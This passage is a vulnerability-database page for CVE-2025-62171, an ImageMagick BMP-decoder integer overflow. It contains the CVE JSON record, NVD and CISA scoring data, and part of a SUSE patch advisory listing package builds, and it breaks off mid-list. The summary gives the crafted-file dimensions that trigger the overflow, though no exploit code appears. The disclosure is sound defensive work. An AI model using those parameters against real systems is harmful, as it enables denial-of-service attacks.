Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-62171 (GCVE-0-2025-62171)
Vulnerability from cvelistv5
Published
2025-10-17 16:30
Modified
2025-10-17 17:05
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-190 - Integer Overflow or Wraparound
Summary
ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ImageMagick | ImageMagick |
Version: < 6.9.13-32 Version: >= 7.0.0-0, < 7.1.2-7 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-62171",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T17:05:36.358600Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T17:05:50.708Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "ImageMagick",
"vendor": "ImageMagick",
"versions": [
{
"status": "affected",
"version": "\u003c 6.9.13-32"
},
{
"status": "affected",
"version": "\u003e= 7.0.0-0, \u003c 7.1.2-7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-190",
"description": "CWE-190: Integer Overflow or Wraparound",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T16:30:27.144Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm"
},
{
"name": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00"
}
],
"source": {
"advisory": "GHSA-9pp9-cfwx-54rm",
"discovery": "UNKNOWN"
},
"title": "ImageMagick vulnerable to denial of service via integer overflow in BMP decoder on 32-bit systems"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-62171",
"datePublished": "2025-10-17T16:30:27.144Z",
"dateReserved": "2025-10-07T16:12:03.425Z",
"dateUpdated": "2025-10-17T17:05:50.708Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-62171\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-17T17:15:49.197\",\"lastModified\":\"2025-10-24T17:06:27.163\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":5.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-190\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.9.13-32\",\"matchCriteriaId\":\"EB78F6C2-7C33-4A0A-A093-6A26A8B9C3BF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"7.0.0-0\",\"versionEndExcluding\":\"7.1.2-7\",\"matchCriteriaId\":\"5F3152BE-0219-45B9-940F-86EED0E01510\"}]}]}],\"references\":[{\"url\":\"https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-62171\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-17T17:05:36.358600Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-17T17:05:44.529Z\"}}], \"cna\": {\"title\": \"ImageMagick vulnerable to denial of service via integer overflow in BMP decoder on 32-bit systems\", \"source\": {\"advisory\": \"GHSA-9pp9-cfwx-54rm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"ImageMagick\", \"product\": \"ImageMagick\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 6.9.13-32\"}, {\"status\": \"affected\", \"version\": \"\u003e= 7.0.0-0, \u003c 7.1.2-7\"}]}], \"references\": [{\"url\": \"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm\", \"name\": \"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00\", \"name\": \"https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-190\", \"description\": \"CWE-190: Integer Overflow or Wraparound\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-17T16:30:27.144Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-62171\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-17T17:05:50.708Z\", \"dateReserved\": \"2025-10-07T16:12:03.425Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-17T16:30:27.144Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
suse-su-2025:3796-1
Vulnerability from csaf_suse
Published
2025-10-27 07:58
Modified
2025-10-27 07:58
Summary
Security update for ImageMagick
Notes
Title of the patch
Security update for ImageMagick
Description of the patch
This update for ImageMagick fixes the following issues:
- CVE-2025-62171: Fixed incomplete fix for integer overflow in BMP Decoder (bsc#1252282).
Patchnames
SUSE-2025-3796,SUSE-SLE-Module-Desktop-Applications-15-SP6-2025-3796,SUSE-SLE-Module-Desktop-Applications-15-SP7-2025-3796
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for ImageMagick",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for ImageMagick fixes the following issues:\n\n- CVE-2025-62171: Fixed incomplete fix for integer overflow in BMP Decoder (bsc#1252282).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-3796,SUSE-SLE-Module-Desktop-Applications-15-SP6-2025-3796,SUSE-SLE-Module-Desktop-Applications-15-SP7-2025-3796",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_3796-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:3796-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20253796-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:3796-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-October/023033.html"
},
{
"category": "self",
"summary": "SUSE Bug 1252282",
"url": "https://bugzilla.suse.com/1252282"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62171 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62171/"
}
],
"title": "Security update for ImageMagick",
"tracking": {
"current_release_date": "2025-10-27T07:58:00Z",
"generator": {
"date": "2025-10-27T07:58:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:3796-1",
"initial_release_date": "2025-10-27T07:58:00Z",
"revision_history": [
{
"date": "2025-10-27T07:58:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "ImageMagick-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.aarch64",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.aarch64",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.46.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-devel-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product": {
"name": "ImageMagick-devel-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product_id": "ImageMagick-devel-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product": {
"name": "libMagick++-7_Q16HDRI5-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product_id": "libMagick++-7_Q16HDRI5-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product": {
"name": "libMagick++-devel-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product_id": "libMagick++-devel-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product": {
"name": "libMagickCore-7_Q16HDRI10-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product_id": "libMagickCore-7_Q16HDRI10-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product": {
"name": "libMagickWand-7_Q16HDRI10-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32",
"product_id": "libMagickWand-7_Q16HDRI10-64bit-7.1.0.9-150400.6.46.1.aarch64_ilp32"
}
}
],
"category": "architecture",
"name": "aarch64_ilp32"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.46.1.i586",
"product_id": "ImageMagick-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.i586",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.i586",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.i586",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.i586",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.i586",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.i586",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.i586",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.i586",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.i586"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.i586",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.i586",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.46.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.0.9-150400.6.46.1.noarch",
"product": {
"name": "ImageMagick-doc-7.1.0.9-150400.6.46.1.noarch",
"product_id": "ImageMagick-doc-7.1.0.9-150400.6.46.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "ImageMagick-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.ppc64le",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.ppc64le",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.46.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.46.1.s390x",
"product_id": "ImageMagick-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.s390x",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.s390x",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.s390x",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.s390x",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.s390x",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.s390x",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.s390x",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.s390x"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.s390x",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.s390x",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.46.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "ImageMagick-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64",
"product": {
